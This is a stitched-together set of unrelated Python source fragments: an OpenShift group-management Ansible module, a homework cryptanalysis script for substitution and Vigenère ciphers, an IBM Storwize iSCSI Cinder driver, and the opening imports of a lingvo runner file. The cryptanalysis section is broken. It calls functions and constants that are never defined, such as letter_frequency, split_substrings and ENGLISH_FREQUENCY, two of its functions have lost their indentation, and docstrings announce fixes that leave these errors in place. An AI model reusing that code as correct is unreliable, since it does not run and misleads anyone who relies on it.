    def create_tmp_file_from_contents(rname, data, ftype='yaml'):
        ''' create a file in tmp with name and contents

        Serializes data as yaml (default), json, or raw text and
        registers the temporary file for cleanup at exit.
        '''

        tmp = Utils.create_tmpfile(prefix=rname)

        if ftype == 'yaml':
            # AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
            # pylint: disable=no-member
            if hasattr(yaml, 'RoundTripDumper'):
                Utils._write(tmp, yaml.dump(data, Dumper=yaml.RoundTripDumper))
            else:
                Utils._write(tmp, yaml.safe_dump(data, default_flow_style=False))

        elif ftype == 'json':
            Utils._write(tmp, json.dumps(data))
        else:
            Utils._write(tmp, data)

        # Register cleanup when module is done
        atexit.register(Utils.cleanup, [tmp])
        return tmp

    @staticmethod
    def create_tmpfile_copy(inc_file):
        '''create a temporary copy of a file'''
        tmpfile = Utils.create_tmpfile('lib_openshift-')
        Utils._write(tmpfile, open(inc_file).read())

        # Cleanup the tmpfile
        atexit.register(Utils.cleanup, [tmpfile])
        return tmpfile

    @staticmethod
    def create_tmpfile(prefix='tmp'):
        ''' Generates and returns a temporary file name '''

        with tempfile.NamedTemporaryFile(prefix=prefix, delete=False) as tmp:
            return tmp.name

    @staticmethod
    def create_tmp_files_from_contents(content, content_type=None):
        '''Turn an array of dict: filename, content into a files array'''
        if not isinstance(content, list):
            content = [content]
        files = []
        for item in content:
            path = Utils.create_tmp_file_from_contents(item['path'] + '-',
                                                       item['data'],
                                                       ftype=content_type)
            files.append({'name': os.path.basename(item['path']),
                          'path': path})
        return files

    @staticmethod
    def cleanup(files):
        '''Clean up on exit '''
        for sfile in files:
            if os.path.exists(sfile):
                if os.path.isdir(sfile):
                    shutil.rmtree(sfile)
                elif os.path.isfile(sfile):
                    os.remove(sfile)

    @staticmethod
    def exists(results, _name):
        ''' Check to see if the results include the name '''
        if not results:
            return False

        if Utils.find_result(results, _name):
            return True

        return False

    @staticmethod
    def find_result(results, _name):
        ''' Find the specified result by name'''
        rval = None
        for result in results:
            # match on the resource's metadata.name field
            if 'metadata' in result and result['metadata']['name'] == _name:
                rval = result
                break

        return rval

    @staticmethod
    def get_resource_file(sfile, sfile_type='yaml'):
        ''' return the service file '''
        contents = None
        with open(sfile) as sfd:
            contents = sfd.read()

        if sfile_type == 'yaml':
            # AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
            # pylint: disable=no-member
            if hasattr(yaml, 'RoundTripLoader'):
                contents = yaml.load(contents, yaml.RoundTripLoader)
            else:
                contents = yaml.safe_load(contents)
        elif sfile_type == 'json':
            contents = json.loads(contents)

        return contents

    @staticmethod
    def filter_versions(stdout):
        ''' filter the oc version output '''

        version_dict = {}
        version_search = ['oc', 'openshift', 'kubernetes']

        for line in stdout.strip().split('\n'):
            for term in version_search:
                if not line:
                    continue
                if line.startswith(term):
                    # version string is the last whitespace-separated token
                    version_dict[term] = line.split()[-1]

        # horrible hack to get openshift version in Openshift 3.2
        #  By default "oc version in 3.2 does not return an "openshift" version
        if "openshift" not in version_dict:
            version_dict["openshift"] = version_dict["oc"]

        return version_dict

    @staticmethod
    def add_custom_versions(versions):
        ''' create custom versions strings '''

        versions_dict = {}

        for tech, version in versions.items():
            # clean up "-" from version
            if "-" in version:
                version = version.split("-")[0]

            if version.startswith('v'):
                versions_dict[tech + '_numeric'] = version[1:].split('+')[0]
                # "v3.3.0.33" is what we have, we want "3.3"
                versions_dict[tech + '_short'] = version[1:4]

        return versions_dict

    @staticmethod
    def openshift_installed():
        ''' check if openshift is installed '''
        import rpm

        transaction_set = rpm.TransactionSet()
        rpmquery = transaction_set.dbMatch("name", "atomic-openshift")

        return rpmquery.count() > 0

    # Disabling too-many-branches.  This is a yaml dictionary comparison function
    # pylint: disable=too-many-branches,too-many-return-statements,too-many-statements
    @staticmethod
    def check_def_equal(user_def, result_def, skip_keys=None, debug=False):
        ''' Given a user defined definition, compare it with the results given back by our query.  '''

        # Currently these values are autogenerated and we do not need to check them
        skip = ['metadata', 'status']
        if skip_keys:
            skip.extend(skip_keys)

        for key, value in result_def.items():
            if key in skip:
                continue

            # Both are lists
            if isinstance(value, list):
                if key not in user_def:
                    if debug:
                        print('User data does not have key [%s]' % key)
                        print('User data: %s' % user_def)
                    return False

                if not isinstance(user_def[key], list):
                    if debug:
                        print('user_def[key] is not a list key=[%s] user_def[key]=%s' % (key, user_def[key]))
                    return False

                if len(user_def[key]) != len(value):
                    if debug:
                        print("List lengths are not equal.")
                        print("key=[%s]: user_def[%s] != value[%s]" % (key, len(user_def[key]), len(value)))
                        print("user_def: %s" % user_def[key])
                        print("value: %s" % value)
                    return False

                for values in zip(user_def[key], value):
                    if isinstance(values[0], dict) and isinstance(values[1], dict):
                        if debug:
                            print('sending list - list')
                            print(type(values[0]))
                            print(type(values[1]))
                        # recurse into paired dict elements
                        result = Utils.check_def_equal(values[0], values[1], skip_keys=skip_keys, debug=debug)
                        if not result:
                            print('list compare returned false')
                            return False

                    elif value != user_def[key]:
                        if debug:
                            print('value should be identical')
                            print(user_def[key])
                            print(value)
                        return False

            # recurse on a dictionary
            elif isinstance(value, dict):
                if key not in user_def:
                    if debug:
                        print("user_def does not have key [%s]" % key)
                    return False
                if not isinstance(user_def[key], dict):
                    if debug:
                        print("dict returned false: not instance of dict")
                    return False

                # before passing ensure keys match
                api_values = set(value.keys()) - set(skip)
                user_values = set(user_def[key].keys()) - set(skip)
                if api_values != user_values:
                    if debug:
                        print("keys are not equal in dict")
                        print(user_values)
                        print(api_values)
                    return False

                result = Utils.check_def_equal(user_def[key], value, skip_keys=skip_keys, debug=debug)
                if not result:
                    if debug:
                        print("dict returned false")
                        print(result)
                    return False

            # Verify each key, value pair is the same
            else:
                if key not in user_def or value != user_def[key]:
                    if debug:
                        print("value not equal; user_def does not have key")
                        print(key)
                        print(value)
                        if key in user_def:
                            print(user_def[key])
                    return False

        if debug:
            print('returning true')
        return True
class OpenShiftCLIConfig(object):
    '''Generic Config

    Holds a resource name, namespace, kubeconfig path, and an options
    mapping of the form {key: {'include': bool, 'value': ...}} that can
    be rendered as command-line flags.
    '''
    def __init__(self, rname, namespace, kubeconfig, options):
        self.kubeconfig = kubeconfig
        self.name = rname
        self.namespace = namespace
        self._options = options

    @property
    def config_options(self):
        ''' return config options '''
        return self._options

    def to_option_list(self, ascommalist=''):
        '''return all options as a string
           if ascommalist is set to the name of a key, and
           the value of that key is a dict, format the dict
           as a list of comma delimited key=value pairs'''
        return self.stringify(ascommalist)

    def stringify(self, ascommalist=''):
        ''' return the options hash as cli params in a string
            if ascommalist is set to the name of a key, and
            the value of that key is a dict, format the dict
            as a list of comma delimited key=value pairs '''
        params = []
        for option_name in sorted(self.config_options):
            option = self.config_options[option_name]
            # Skip options marked excluded, and those with falsy values
            # unless the value is an int (0 is a legitimate setting).
            if not option['include']:
                continue
            if not option['value'] and not isinstance(option['value'], int):
                continue
            if option_name == ascommalist:
                rendered = ','.join('{}={}'.format(item_key, item_val)
                                    for item_key, item_val in sorted(option['value'].items()))
            else:
                rendered = option['value']
            params.append('--{}={}'.format(option_name.replace('_', '-'), rendered))
        return params
# -*- -*- -*- End included fragment: lib/base.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/group.py -*- -*- -*-
class GroupConfig(object):
    ''' Handle route options

    Builds the dict representation of an OpenShift Group resource
    from a name, namespace and kubeconfig path.
    '''
    # pylint: disable=too-many-arguments
    def __init__(self,
                 sname,
                 namespace,
                 kubeconfig):
        ''' constructor for handling group options '''
        self.kubeconfig = kubeconfig
        self.name = sname
        self.namespace = namespace
        self.data = {}

        self.create_dict()

    def create_dict(self):
        ''' return a service as a dict '''
        self.data.update({
            'apiVersion': 'v1',
            'kind': 'Group',
            'metadata': {'name': self.name},
            # membership is managed elsewhere; start with no users
            'users': None,
        })
# pylint: disable=too-many-instance-attributes
class Group(Yedit):
    ''' Class to wrap the oc command line tools

    Thin Yedit subclass: holds a group resource's content and exposes
    Yedit's get/put editing interface on it.
    '''
    kind = 'group'

    def __init__(self, content):
        '''Group constructor'''
        super(Group, self).__init__(content=content)
# -*- -*- -*- End included fragment: lib/group.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: class/oc_group.py -*- -*- -*-
class OCGroup(OpenShiftCLI):
    ''' Class to wrap the oc command line tools '''
    kind = 'group'

    def __init__(self,
                 config,
                 verbose=False):
        ''' Constructor for OCGroup '''
        super(OCGroup, self).__init__(config.namespace, config.kubeconfig)
        self.config = config
        self.namespace = config.namespace
        # lazily populated by the `group` property via get()
        self._group = None

    @property
    def group(self):
        ''' property function service'''
        if not self._group:
            self.get()
        return self._group

    @group.setter
    def group(self, data):
        ''' setter function for yedit var '''
        self._group = data

    def exists(self):
        ''' return whether a group exists '''
        if self.group:
            return True

        return False

    def get(self):
        '''return group information '''
        result = self._get(self.kind, self.config.name)
        if result['returncode'] == 0:
            self.group = Group(content=result['results'][0])
        elif 'groups \"{}\" not found'.format(self.config.name) in result['stderr']:
            # a missing group is not an error for our callers; normalize
            # to a successful, empty result
            result['returncode'] = 0
            result['results'] = [{}]

        return result

    def delete(self):
        '''delete the object'''
        return self._delete(self.kind, self.config.name)

    def create(self):
        '''create the object'''
        return self._create_from_content(self.config.name, self.config.data)

    def update(self):
        '''update the object'''
        return self._replace_content(self.kind, self.config.name, self.config.data)

    def needs_update(self):
        ''' verify an update is needed '''
        return not Utils.check_def_equal(self.config.data, self.group.yaml_dict, skip_keys=[], debug=True)

    # pylint: disable=too-many-return-statements,too-many-branches
    @staticmethod
    def run_ansible(params, check_mode=False):
        '''run the idempotent ansible code

        Dispatches on params['state'] ('list', 'absent', 'present')
        and returns an ansible-style result dict.
        '''
        gconfig = GroupConfig(params['name'],
                              params['namespace'],
                              params['kubeconfig'],
                              )
        oc_group = OCGroup(gconfig, verbose=params['debug'])

        state = params['state']

        api_rval = oc_group.get()

        if api_rval['returncode'] != 0:
            return {'failed': True, 'msg': api_rval}

        #####
        # Get
        #####
        if state == 'list':
            return {'changed': False, 'results': api_rval['results'], 'state': state}

        ########
        # Delete
        ########
        if state == 'absent':
            if oc_group.exists():

                if check_mode:
                    return {'changed': True, 'msg': 'CHECK_MODE: Would have performed a delete.'}

                api_rval = oc_group.delete()

                if api_rval['returncode'] != 0:
                    return {'failed': True, 'msg': api_rval}

                return {'changed': True, 'results': api_rval, 'state': state}

            return {'changed': False, 'state': state}

        if state == 'present':
            ########
            # Create
            ########
            if not oc_group.exists():

                if check_mode:
                    return {'changed': True, 'msg': 'CHECK_MODE: Would have performed a create.'}

                # Create it here
                api_rval = oc_group.create()

                if api_rval['returncode'] != 0:
                    return {'failed': True, 'msg': api_rval}

                # return the created object
                api_rval = oc_group.get()

                if api_rval['returncode'] != 0:
                    return {'failed': True, 'msg': api_rval}

                return {'changed': True, 'results': api_rval, 'state': state}

            ########
            # Update
            ########
            if oc_group.needs_update():
                api_rval = oc_group.update()

                if api_rval['returncode'] != 0:
                    return {'failed': True, 'msg': api_rval}

                # return the created object
                api_rval = oc_group.get()

                if api_rval['returncode'] != 0:
                    return {'failed': True, 'msg': api_rval}

                return {'changed': True, 'results': api_rval, 'state': state}

            return {'changed': False, 'results': api_rval, 'state': state}

        return {'failed': True, 'msg': 'Unknown state passed. {}'.format(state)}
# -*- -*- -*- End included fragment: class/oc_group.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: ansible/oc_group.py -*- -*- -*-
#pylint: disable=too-many-branches
def main():
    '''
    ansible oc module for group

    Parses the module arguments and delegates all work to
    OCGroup.run_ansible, translating its result into
    exit_json/fail_json.
    '''

    module = AnsibleModule(
        argument_spec=dict(
            kubeconfig=dict(default='/etc/origin/master/admin.kubeconfig', type='str'),
            state=dict(default='present', type='str',
                       choices=['present', 'absent', 'list']),
            debug=dict(default=False, type='bool'),
            name=dict(default=None, type='str'),
            namespace=dict(default='default', type='str'),
            # adding users to a group is handled through the oc_users module
            #users=dict(default=None, type='list'),
        ),
        supports_check_mode=True,
    )

    rval = OCGroup.run_ansible(module.params, module.check_mode)

    if 'failed' in rval:
        return module.fail_json(**rval)

    return module.exit_json(**rval)


if __name__ == '__main__':
    main()
# -*- -*- -*- End included fragment: ansible/oc_group.py -*- -*- -*-
|
|
#!/usr/bin/env python3
"""
I intend this to be a cryptanalysis suite that can analyze an arbitrary
ciphertext and provide details on what the encryption method might be,
what the key might look like, and/or a potential cipher text solution.
"""
# The monoalphabetic-substitution ciphertext under analysis.
# Backslash continuations keep the literal as one unbroken string.
ORIGINAL_CIPHERTEXT = "\
NAGQNXIIZAGBGIIYXQOMQUGQUZAXTNGMYXQGTTASNISQO\
AMFGZAGEZVOOGUZAGIGMTAMQUTZYMXQGUMCMYZDECMLWS\
RVQYVIEASVQUTXLMQQSZTZMYZZAGDMOMXQSQMPVMYYESR\
WQSNIGUOGZAGEAMZGZSAVQZXLMQAMVIZAGDMQUVYOGZAG\
DQSDSYGQSDSYGLMQXGQUVYGZSBGMYZAGBYVQZSRZAGBSS\
WTZAMZIXGSVZSQZAGUGTWTMRVIIZAYGGTLSYGSRTGFGYM\
IXQTVIZTSRBISZZGUCMOGTMQUTLYMNISRTISFGQIENSYW\
ZAMZZAGEAMFGSRRGYGUDGXMDTXLWMQUZXYGUDSYGZAMQM\
QEZAYMIIVCSQZAGNSSUTZMLWTNSYWXQONGMYXGUIE"

# Letter frequencies taken from Table 1.1 from Understanding Crypto, page 9
# Relative frequency of each letter in typical English text; values sum to ~1.
ENGLISH_LETTER_FREQUENCY = {
    'A' : .0817,
    'B' : .0150,
    'C' : .0278,
    'D' : .0425,
    'E' : .1270,
    'F' : .0223,
    'G' : .0202,
    'H' : .0609,
    'I' : .0697,
    'J' : .0015,
    'K' : .0077,
    'L' : .0403,
    'M' : .0241,
    'N' : .0675,
    'O' : .0751,
    'P' : .0193,
    'Q' : .0010,
    'R' : .0599,
    'S' : .0633,
    'T' : .0906,
    'U' : .0276,
    'V' : .0098,
    'W' : .0236,
    'X' : .0015,
    'Y' : .0197,
    'Z' : .0007
}
# Working substitution table for manual cryptanalysis: every ciphertext
# letter starts mapped to the placeholder '_' until a plaintext letter
# is guessed for it.
substitution_dict = {chr(code): '_' for code in range(ord('A'), ord('Z') + 1)}
def find_letter_distribution(ciphertext, percentage=False):
    """
    Return a dict mapping each character of *ciphertext* to its count.
    When *percentage* is True the counts are normalized by the text
    length so the values sum to 1.
    """
    counts = {}
    for symbol in ciphertext:
        counts[symbol] = counts.get(symbol, 0) + 1

    if percentage:
        total = len(ciphertext)
        for symbol in counts:
            counts[symbol] /= total

    return counts
def translate_from_dictionary(ciphertext, translate):
    """
    Substitute each character of *ciphertext* through the *translate*
    mapping and return the resulting plaintext string.
    Raises KeyError for characters missing from the mapping.
    """
    return ''.join(translate[symbol] for symbol in ciphertext)
def count_digraphs(ciphertext):
"""
Count and print the most frequent 2-letter
combinations in the ciphertext.
"""
# Zip the ciphertext with an offset to get 2char elements
two_letter_set = [x+y for x,y in zip(*[ciphertext[i:]
for i in range(2)])]
digraph_frequency = dict()
for digraph in two_letter_set:
if digraph not in digraph_frequency:
digraph_frequency[digraph] = 1
else:
digraph_frequency[digraph] += 1
print('2-letter sequences:')
for digraph in sorted(digraph_frequency,
key=digraph_frequency.get,
reverse=True):
if digraph_frequency[digraph] > 5:
print(digraph, digraph_frequency[digraph])
print()
def count_trigraphs(ciphertext):
"""
Count and print the most frequent
3-letter combinations in ciphertext.
"""
# Zip the ciphertext with an offset to get 3char elements
three_letter_set = [x+y+z for x,y,z in zip(*[ciphertext[i:]
for i in range(3)])]
trigraph_frequency = dict()
for trigraph in three_letter_set:
if trigraph not in trigraph_frequency:
trigraph_frequency[trigraph] = 1
else:
trigraph_frequency[trigraph] += 1
print('3 letter sequences:')
for trigraph in sorted(trigraph_frequency,
key=trigraph_frequency.get,
reverse=True):
if trigraph_frequency[trigraph] > 3:
print(trigraph, trigraph_frequency[trigraph])
print()
def vigenere_split_substrings(ciphertext, keylength):
    """ Split *ciphertext* into *keylength* interleaved substrings,
    shifting each letter back by the number of completed key cycles
    (as described in Homework 2 problem 2). """
    substrings = [''] * keylength
    for index, letter in enumerate(ciphertext):
        # cycle = how many full key passes precede this letter;
        # slot   = which key position (and thus substring) it belongs to.
        cycle, slot = divmod(index, keylength)
        shifted = ord(letter) - cycle
        # Wrap back into the uppercase ASCII range 65-90 without using
        # modulo on the letter value (assignment constraint).
        while shifted < 65:
            shifted += 26
        substrings[slot] += chr(shifted)
    return substrings
def index_of_coincidence(ciphertext):
    """ Calculates the index of coincidence of ciphertext, as
    defined in the Vigenere slides """
    counts = letter_frequency(ciphertext)
    # Numerator: sum of n*(n-1) over each letter's count n.
    numerator = sum(count * (count - 1) for count in counts.values())
    # Denominator: number of ordered position pairs, N*(N-1).
    denominator = len(ciphertext) * (len(ciphertext) - 1)
    return numerator / denominator
def test_key_lengths():
    """ Find the average index of coincidence for various key lengths. """
    # The key length whose substrings score closest to English-like text
    # is the likely Vigenere period.
    for keylength in range(1, 15):
        substrings = split_substrings(CIPHERTEXT, keylength)
        avg_index = sum(index_of_coincidence(s) for s in substrings) / keylength
        print('Key length:', keylength, 'average index of coincidence:',
              '%.4f' % avg_index)
# English cipher-text should have roughly .066 index of coincidence.
def test_g_value(ciphertext, g):
    """ Tests the distribution index of coincidence with an offset of g.
    High indices ~.066 indicate g is the offset value for the substring. """
    distribution = letter_frequency(ciphertext)
    total = 0
    text_length = len(ciphertext)
    # For each plaintext letter, compare the English frequency against the
    # ciphertext frequency of that letter shifted forward by g.
    for value in range(65, 91):
        # g is in 0..25, so one modulo wrap is equivalent to the manual
        # "subtract 26 if past 'Z'" adjustment.
        shifted_letter = chr((value - 65 + g) % 26 + 65)
        # Default to zero when the shifted letter never appears.
        cipher_frequency = distribution.get(shifted_letter, 0)
        total += ENGLISH_FREQUENCY[chr(value)] * cipher_frequency / text_length
    return total
def compute_key(ciphertext, keylength):
    """ Compute the index of coincidence for all possible offset values (g) and
    print when one is close to an English distribution.

    Fix: previously this function ignored its ``ciphertext`` argument and
    always analyzed the module-level CIPHERTEXT, so callers could not test
    any other text. It now analyzes the text it is given.
    """
    substrings = split_substrings(ciphertext, keylength)
    for sub in substrings:
        print('Testing substring', sub)
        # Try every possible Caesar offset for this key position.
        for g in range(0, 26):
            tested_value = test_g_value(sub, g)
            if tested_value > .05:
                print('g value of', g, '(letter', chr(g + 65) +
                      ') gives index of', tested_value)
def decrypt_ciphertext(ciphertext, key):
    """ Decrypts ciphertext assuming a repeated 'key' as the keystring
    where each iteration of 'key' is incremented modulo 26. """
    plaintext = ''
    for position, letter in enumerate(ciphertext):
        # cycle counts completed passes through the key; pos indexes into it.
        cycle, pos = divmod(position, len(key))
        # -65 to account for 'A' = 65; cycle accounts for the repeated key.
        value = ord(letter) - (ord(key[pos]) - 65 + cycle)
        # Wrap back into the uppercase ASCII range 65-90.
        while value < 65:
            value += 26
        plaintext += chr(value)
    return plaintext
def general_analysis(ciphertext):
    """
    Prints general analysis of a ciphertext to the console.
    Included are: length, unique letters, frequent digraphs/trigraphs,
    and a tentative translation.

    Fix: the digraph/trigraph counts and the translation previously always
    analyzed the module-level ORIGINAL_CIPHERTEXT, ignoring the
    ``ciphertext`` argument; they now analyze the text passed in.
    """
    print('Total length of ciphertext:', len(ciphertext))
    print('Unique letters:', len(find_letter_distribution(ciphertext)))
    count_digraphs(ciphertext)
    count_trigraphs(ciphertext)
    print('Translation:\n', translate(ciphertext))
|
|
# Copyright 2015 IBM Corp.
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
ISCSI volume driver for IBM Storwize family and SVC storage systems.
Notes:
1. If you specify both a password and a key file, this driver will use the
key file only.
2. When using a key file for authentication, it is up to the user or
system administrator to store the private key in a safe manner.
3. The defaults for creating volumes are "-rsize 2% -autoexpand
-grainsize 256 -warning 0". These can be changed in the configuration
file or by using volume types(recommended only for advanced users).
Limitations:
1. The driver expects CLI output in English, error messages may be in a
localized format.
2. Clones and creating volumes from snapshots, where the source and target
are of different sizes, is not supported.
"""
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from cinder import exception
from cinder.i18n import _, _LE, _LW
from cinder import interface
from cinder import utils
from cinder.volume.drivers.ibm.storwize_svc import (
storwize_svc_common as storwize_common)
# Module-level logger for this driver.
LOG = logging.getLogger(__name__)
# iSCSI-specific configuration options; CHAP authentication is on by default.
storwize_svc_iscsi_opts = [
    cfg.BoolOpt('storwize_svc_iscsi_chap_enabled',
                default=True,
                help='Configure CHAP authentication for iSCSI connections '
                     '(Default: Enabled)'),
]
CONF = cfg.CONF
# Register the options so they are recognized in cinder.conf.
CONF.register_opts(storwize_svc_iscsi_opts)
@interface.volumedriver
class StorwizeSVCISCSIDriver(storwize_common.StorwizeSVCCommonDriver):
    """IBM Storwize V7000 and SVC iSCSI volume driver.
    Version history:
    .. code-block:: none
        1.0 - Initial driver
        1.1 - FC support, create_cloned_volume, volume type support,
              get_volume_stats, minor bug fixes
        1.2.0 - Added retype
        1.2.1 - Code refactor, improved exception handling
        1.2.2 - Fix bug #1274123 (races in host-related functions)
        1.2.3 - Fix Fibre Channel connectivity: bug #1279758 (add delim
                to lsfabric, clear unused data from connections, ensure
                matching WWPNs by comparing lower case
        1.2.4 - Fix bug #1278035 (async migration/retype)
        1.2.5 - Added support for manage_existing (unmanage is inherited)
        1.2.6 - Added QoS support in terms of I/O throttling rate
        1.3.1 - Added support for volume replication
        1.3.2 - Added support for consistency group
        1.3.3 - Update driver to use ABC metaclasses
        2.0 - Code refactor, split init file and placed shared methods
              for FC and iSCSI within the StorwizeSVCCommonDriver class
        2.0.1 - Added support for multiple pools with model update
        2.1 - Added replication V2 support to the global/metro mirror
              mode
        2.1.1 - Update replication to version 2.1
    """
    VERSION = "2.1.1"
    # ThirdPartySystems wiki page
    CI_WIKI_NAME = "IBM_STORWIZE_CI"
    def __init__(self, *args, **kwargs):
        # Shared Storwize/SVC setup happens in the common driver; here we
        # only mark the protocol and register the iSCSI-specific options.
        super(StorwizeSVCISCSIDriver, self).__init__(*args, **kwargs)
        self.protocol = 'iSCSI'
        self.configuration.append_config_values(
            storwize_svc_iscsi_opts)
    def validate_connector(self, connector):
        """Check connector for at least one enabled iSCSI protocol."""
        # The initiator IQN is required to create/match a host object on the
        # backend; fail fast if it is missing.
        if 'initiator' not in connector:
            LOG.error(_LE('The connector does not contain the required '
                          'information.'))
            raise exception.InvalidConnectorException(
                missing='initiator')
    def initialize_connection(self, volume, connector):
        """Perform necessary work to make an iSCSI connection."""
        # Serialize per (storage system, host) so concurrent attach/detach
        # requests for the same host cannot race on host/mapping state.
        @utils.synchronized('storwize-host' + self._state['system_id'] +
                            connector['host'], external=True)
        def _do_initialize_connection_locked():
            return self._do_initialize_connection(volume, connector)
        return _do_initialize_connection_locked()
    def _do_initialize_connection(self, volume, connector):
        """Perform necessary work to make an iSCSI connection.
        To be able to create an iSCSI connection from a given host to a
        volume, we must:
        1. Translate the given iSCSI name to a host name
        2. Create new host on the storage system if it does not yet exist
        3. Map the volume to the host if it is not already done
        4. Return the connection information for relevant nodes (in the
           proper I/O group)
        """
        LOG.debug('enter: initialize_connection: volume %(vol)s with connector'
                  ' %(conn)s', {'vol': volume['id'], 'conn': connector})
        volume_name = volume['name']
        # Check if a host object is defined for this host name
        host_name = self._helpers.get_host_from_connector(connector)
        if host_name is None:
            # Host does not exist - add a new host to Storwize/SVC
            host_name = self._helpers.create_host(connector)
        # Create a CHAP secret when CHAP is enabled and the host lacks one;
        # a leftover secret while CHAP is disabled only merits a warning.
        chap_secret = self._helpers.get_chap_secret_for_host(host_name)
        chap_enabled = self.configuration.storwize_svc_iscsi_chap_enabled
        if chap_enabled and chap_secret is None:
            chap_secret = self._helpers.add_chap_secret_to_host(host_name)
        elif not chap_enabled and chap_secret:
            LOG.warning(_LW('CHAP secret exists for host but CHAP is '
                            'disabled.'))
        volume_attributes = self._helpers.get_vdisk_attributes(volume_name)
        if volume_attributes is None:
            msg = (_('initialize_connection: Failed to get attributes'
                     ' for volume %s.') % volume_name)
            LOG.error(msg)
            raise exception.VolumeDriverException(message=msg)
        multihostmap = self.configuration.storwize_svc_multihostmap_enabled
        lun_id = self._helpers.map_vol_to_host(volume_name, host_name,
                                               multihostmap)
        try:
            preferred_node = volume_attributes['preferred_node_id']
            IO_group = volume_attributes['IO_group_id']
        except KeyError as e:
            LOG.error(_LE('Did not find expected column name in '
                          'lsvdisk: %s.'), e)
            raise exception.VolumeBackendAPIException(
                data=_('initialize_connection: Missing volume attribute for '
                       'volume %s.') % volume_name)
        try:
            # Get preferred node and other nodes in I/O group
            preferred_node_entry = None
            io_group_nodes = []
            for node in self._state['storage_nodes'].values():
                # Only consider nodes with iSCSI enabled.
                if self.protocol not in node['enabled_protocols']:
                    continue
                if node['id'] == preferred_node:
                    preferred_node_entry = node
                if node['IO_group'] == IO_group:
                    io_group_nodes.append(node)
            if not len(io_group_nodes):
                msg = (_('initialize_connection: No node found in '
                         'I/O group %(gid)s for volume %(vol)s.') %
                       {'gid': IO_group, 'vol': volume_name})
                LOG.error(msg)
                raise exception.VolumeBackendAPIException(data=msg)
            if not preferred_node_entry:
                # Get 1st node in I/O group
                preferred_node_entry = io_group_nodes[0]
                LOG.warning(_LW('initialize_connection: Did not find a '
                                'preferred node for volume %s.'), volume_name)
            properties = {}
            properties['target_discovered'] = False
            properties['target_lun'] = lun_id
            properties['volume_id'] = volume['id']
            # Prefer an IPv4 portal address; fall back to IPv6.
            if len(preferred_node_entry['ipv4']):
                ipaddr = preferred_node_entry['ipv4'][0]
            else:
                ipaddr = preferred_node_entry['ipv6'][0]
            properties['target_portal'] = '%s:%s' % (ipaddr, '3260')
            properties['target_iqn'] = preferred_node_entry['iscsi_name']
            if chap_secret:
                properties['auth_method'] = 'CHAP'
                properties['auth_username'] = connector['initiator']
                properties['auth_password'] = chap_secret
                properties['discovery_auth_method'] = 'CHAP'
                properties['discovery_auth_username'] = (
                    connector['initiator'])
                properties['discovery_auth_password'] = chap_secret
        except Exception:
            # Undo the host mapping created above before re-raising.
            with excutils.save_and_reraise_exception():
                self._do_terminate_connection(volume, connector)
                LOG.error(_LE('initialize_connection: Failed '
                              'to collect return '
                              'properties for volume %(vol)s and connector '
                              '%(conn)s.\n'), {'vol': volume,
                                               'conn': connector})
        LOG.debug('leave: initialize_connection:\n volume: %(vol)s\n '
                  'connector %(conn)s\n properties: %(prop)s',
                  {'vol': volume['id'], 'conn': connector,
                   'prop': properties})
        return {'driver_volume_type': 'iscsi', 'data': properties, }
    def terminate_connection(self, volume, connector, **kwargs):
        """Cleanup after an iSCSI connection has been terminated."""
        # If a fake connector is generated by nova when the host
        # is down, then the connector will not have a host property,
        # In this case construct the lock without the host property
        # so that all the fake connectors to an SVC are serialized
        host = connector['host'] if 'host' in connector else ""
        @utils.synchronized('storwize-host' + self._state['system_id'] + host,
                            external=True)
        def _do_terminate_connection_locked():
            return self._do_terminate_connection(volume, connector,
                                                 **kwargs)
        return _do_terminate_connection_locked()
    def _do_terminate_connection(self, volume, connector, **kwargs):
        """Cleanup after an iSCSI connection has been terminated.
        When we clean up a terminated connection between a given connector
        and volume, we:
        1. Translate the given connector to a host name
        2. Remove the volume-to-host mapping if it exists
        3. Delete the host if it has no more mappings (hosts are created
           automatically by this driver when mappings are created)
        """
        LOG.debug('enter: terminate_connection: volume %(vol)s with connector'
                  ' %(conn)s', {'vol': volume['id'], 'conn': connector})
        vol_name = volume['name']
        info = {}
        if 'host' in connector:
            # get host according to iSCSI protocol
            info = {'driver_volume_type': 'iscsi',
                    'data': {}}
            host_name = self._helpers.get_host_from_connector(connector)
            if host_name is None:
                msg = (_('terminate_connection: Failed to get host name from'
                         ' connector.'))
                LOG.error(msg)
                raise exception.VolumeDriverException(message=msg)
        else:
            # See bug #1244257
            host_name = None
        # Unmap volumes, if hostname is None, need to get value from vdiskmap
        host_name = self._helpers.unmap_vol_from_host(vol_name, host_name)
        # Host_name could be none
        if host_name:
            # Delete the host object when this was its last mapping.
            resp = self._helpers.check_host_mapped_vols(host_name)
            if not len(resp):
                self._helpers.delete_host(host_name)
        LOG.debug('leave: terminate_connection: volume %(vol)s with '
                  'connector %(conn)s', {'vol': volume['id'],
                                         'conn': connector})
        return info
|
|
# Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Graph based runners."""
import contextlib
import os
import re
import threading
import time
from absl import flags
from lingvo import pdb_wrapper
import lingvo.compat as tf
from lingvo.core import base_model
from lingvo.core import checkpointer
from lingvo.core import cluster_factory
from lingvo.core import metrics
from lingvo.core import py_utils
from lingvo.core import summary_utils
from lingvo.core import tpu_embedding_layers
import numpy as np
from lingvo import base_runner
from google.protobuf import text_format
# pylint:disable=g-direct-tensorflow-import
from tensorflow.core.framework import summary_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
